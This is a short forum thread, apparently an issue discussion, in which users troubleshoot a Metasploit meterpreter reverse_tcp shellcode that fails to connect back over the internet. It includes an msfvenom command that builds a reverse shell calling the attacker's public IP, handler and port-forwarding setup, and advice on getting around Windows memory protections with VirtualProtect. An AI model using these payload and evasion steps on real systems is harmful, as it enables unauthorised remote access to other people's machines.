Shellcode Not Running...?

[tteddy3976]

Hello. Was hoping to get some feedback on this- trying to run an attack over WAN:

Attacker:
VB 4.17.0-kali1-amd64 with latest meta apt upgrade.

*msfvenom -p windows/meterpreter/reverse_tcp LHOST=public ip LPORT=4444 -f raw > raw.txt
(build bmp, etc)

*web is running on port 8080

*NAT FWD: TCP on 8080 & 4444 to attacker LAN IP

*The PS batch file handshakes with web server and I see GET 202 etc. But no shell on attacker host.

*using multi/handler meterpreter/reverse_tcp LHOST 0.0.0.0 on 4444

*Running wireshark on target host I see the 8080 traffic but nothing on 4444. It ...appears... its downloading on 8080 but the shellcode just isnt running. No error(s).

Handler returns nothing. Any ideas?

[dcliss]

same here . i think the problem lies with the shellcode msfvenom generates

[Lexus89]

Unfortunately having the same issue as well..

[Mr-Un1k0d3r]

Unfortunately modern Windows version have put in place some mitigation that prevent the shellcode to run properly. The issue is caused by the fact that the shellcode need RWX memory which are flagged when the shellcode is executed. There is an EXE version of the decoder that can be used to set the proper permission using some standard Windows API call to set proper permission (VirtualProtect). This should address the issue.

[slavadba]

"There is an EXE version of the decoder that can be used to set the proper permission using some standard Windows API call to set proper permission (VirtualProtect). " - can you pu some more details? where is EXE file you talking about? myabe some small example for clarify?